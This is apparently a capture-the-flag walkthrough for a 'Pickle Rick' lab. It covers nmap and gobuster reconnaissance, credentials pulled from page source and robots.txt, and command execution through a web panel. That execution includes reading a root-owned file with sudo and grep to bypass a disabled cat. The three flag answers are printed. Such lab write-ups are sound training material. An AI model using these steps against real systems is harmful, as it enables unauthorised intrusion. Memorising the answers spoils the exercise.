Pickle Rick

Task 1: Pickle Rick

What is the first ingredient that Rick needs?

Let's perform a simple nmap scan to see which ports are open.

$ nmap -sC -sV 10.10.88.164
Starting Nmap 7.92 ( https://nmap.org ) at 2023-11-11 14:52 IST
Nmap scan report for 10.10.88.164
Host is up (0.13s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b0:56:f1:d5:f7:ee:f0:9f:0f:9f:07:88:c6:56:7a:29 (RSA)
|   256 ef:9b:c2:3f:b3:84:8d:22:5e:d2:b4:09:59:ba:be:15 (ECDSA)
|_  256 0d:2a:4f:24:a0:9f:3d:20:80:31:b8:51:42:29:a7:0f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.91 seconds

There are two open ports:

Port	Service
22	ssh
80	http

Let's enter the IP address in the browser and see what comes up.

Let's check the page source for more information.

So we have a username now: R1ckRul3s. However we don't know the password yet.

On most websites, the robots.txt file does the job of disallowing web crawlers from accessing particular pages. Let's see if we can find anything there.

Looks like Wubbalubbadubdub is the password.

But where should we enter these credentials? In order to find the login page we will have to perform some directory brute-forcing. There are various tools available, but in this case let's use gobuster.

$ gobuster dir -u http://10.10.88.164 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.88.164
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 291]
/login.php            (Status: 200) [Size: 882]
/assets               (Status: 301) [Size: 313] [--> http://10.10.88.164/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]

<SNIP>

We can see a /login.php file. Let's go to the file in the browser.

Let's enter the credentials that we found before i.e. R1ckRul3s as username and Wubbalubbadubdub as the password.

We're in and we have a Command Panel to enter our commands.

We can use the ls command to list the files and subdirectories.

The Sup3rS3cretPickl3Ingred.txt file seems interesting. Let's cat the contents of that file.

Oh! So cat is disabled. We have to find another way to read the file.

We can grep all the contents of the file by using the . regular expression.

grep . Sup3rS3cretPickl3Ingred.txt

Answer

mr. meeseek hair

 

What is the second ingredient in Rick’s potion?

We can check which user are present by using the following command:

cd /home ; ls

Let's check what files rick has using the following command:

cd /home/rick ; ls

Let's see what is in to the second ingredients.

grep . /home/rick/"second ingredients"

Answer

1 jerry tear

 

What is the last and final ingredient?

Let's look at the /root directory using the following command:

sudo ls /root

As always, we can use grep to read the contents of a file.

sudo grep . /root/3rd.txt

Answer

fleeb juice